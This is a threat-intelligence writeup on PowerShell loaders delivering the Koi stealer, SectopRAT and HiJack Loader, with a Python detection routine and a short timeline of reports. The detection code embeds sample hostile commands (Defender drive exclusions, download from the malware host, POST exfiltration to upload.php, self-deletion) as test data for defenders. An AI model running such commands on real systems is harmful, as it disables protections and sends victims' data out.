Threat researchers documented multiple malware delivery chains using PowerShell-based loaders to fetch and execute credential theft and remote access payloads. In one campaign tied to NullMixer, a 32-bit loader masquerading as sqlcmd.exe pulled a script from a compromised WordPress site, decrypted an embedded .NET assembly, and launched the Koi stealer. Koi targeted credentials and data from browsers, FileZilla, Discord, Telegram, VPN clients, cryptocurrency wallets, and Twilio Authy, while also checking for Trezor hardware wallets; it used anti-analysis, anti-reinfection, and geofencing logic to avoid systems configured for several CIS countries.
A separate PowerShell dropper hosted on fancysunshine[.]top was used to deploy SectopRAT and HiJack Loader while attempting to weaken defenses and erase evidence. The script added Windows Defender exclusions for the C: drive and selected processes, downloaded NC.zip and RD.zip, unpacked them into fake Chrome cache directories under %TEMP%, and executed S-D.exe from both locations. It also gathered the victim's external IP address and username, checked for a scheduled task named MSSecurity, exfiltrated results to upload.php over HTTP POST, and then deleted the archives, extracted files, output data, and the dropper itself to reduce forensic visibility.
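As an added illustration (not code from the report or from Mallory), the following Python triage routine turns the dropper behaviours described above into detection rules and runs them over constructed PowerShell script-block log entries (Event ID 4104 style); the sample entries, rule names and severity thresholds are assumptions, not the real script.

```python
import re

# Constructed sample script-block entries modelled on the reported behaviours
# (Defender exclusions, staging under %TEMP% as a fake Chrome cache, scheduled
# task probe, HTTP POST to upload.php, self-deletion) plus one benign line.
SAMPLE_SCRIPT_BLOCKS = [
    r'Add-MpPreference -ExclusionPath "C:\"',
    r'Add-MpPreference -ExclusionProcess "S-D.exe"',
    r'Invoke-WebRequest -Uri "http://fancysunshine[.]top/NC.zip" -OutFile "$env:TEMP\NC.zip"',
    r'Expand-Archive -Path "$env:TEMP\NC.zip" -DestinationPath "$env:TEMP\Google\Chrome\Cache"',
    r'Get-ScheduledTask -TaskName MSSecurity -ErrorAction SilentlyContinue',
    r'Invoke-RestMethod -Uri "http://fancysunshine[.]top/upload.php" -Method Post -Body $out',
    r'Remove-Item -Path $MyInvocation.MyCommand.Path -Force',
    r'Get-ChildItem -Path "C:\Users" | Select-Object Name',  # benign admin activity
]

# Each rule targets one behaviour from the report; names are assumptions.
RULES = {
    # Excluding a whole drive root (e.g. C:\) is far rarer than excluding a folder.
    "defender_drive_root_exclusion": re.compile(
        r'Add-MpPreference\s+-ExclusionPath\s+["\']?[A-Za-z]:\\?["\']?\s*$', re.I),
    "defender_process_exclusion": re.compile(r'Add-MpPreference\s+-ExclusionProcess\b', re.I),
    "archive_to_temp_chrome_cache": re.compile(
        r'Expand-Archive\b.*-DestinationPath\s+"?\$env:TEMP\\.*Chrome\\Cache', re.I),
    "scheduled_task_probe": re.compile(r'Get-ScheduledTask\b.*-TaskName\s+["\']?MSSecurity\b', re.I),
    "http_post_upload_php": re.compile(
        r'(Invoke-RestMethod|Invoke-WebRequest)\b(?=.*upload\.php)(?=.*-Method\s+Post)', re.I),
    "self_delete": re.compile(r'Remove-Item\b.*\$MyInvocation\.MyCommand\.Path', re.I),
}

DEFENDER_RULES = {"defender_drive_root_exclusion", "defender_process_exclusion"}


def scan_script_blocks(blocks):
    """Return {rule_name: [indexes of matching entries]} for every rule that fires."""
    hits = {}
    for idx, text in enumerate(blocks):
        for name, pattern in RULES.items():
            if pattern.search(text):
                hits.setdefault(name, []).append(idx)
    return hits


def triage(hits):
    """Defender exclusions alone are noisy (admins add them legitimately), so
    escalate to 'high' only when they co-occur with at least two of the
    staging, C2 or cleanup behaviours; any single behaviour is 'medium'."""
    defender = DEFENDER_RULES & hits.keys()
    others = hits.keys() - DEFENDER_RULES
    if defender and len(others) >= 2:
        return "high"
    if defender or others:
        return "medium"
    return "none"
```

Feed real 4104 message bodies into scan_script_blocks one entry at a time; the drive-root rule deliberately does not fire on folder exclusions, so tune it if your environment legitimately excludes drive roots.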

2 events from the most recent confirmed update back to the earliest known activity.
A report published on 2025-06-22 described a PowerShell-based dropper delivered from fancysunshine[.]top that downloaded and executed payloads identified as SectopRAT and HiJack Loader. The script attempted defense evasion with Windows Defender exclusions, collected the victim's external IP and username, exfiltrated data to upload.php, and deleted artifacts to reduce forensic visibility.
An analysis published on 2023-03-28 documented the NullMixer campaign tracked as ATK-16 delivering a 32-bit MSVC loader named sqlcmd.exe, which fetched PowerShell from compromised infrastructure and ultimately deployed the Koi stealer. The report described Koi's credential and data theft capabilities, anti-analysis logic, CIS-region execution checks, C2 communications, and provided observables and YARA rules.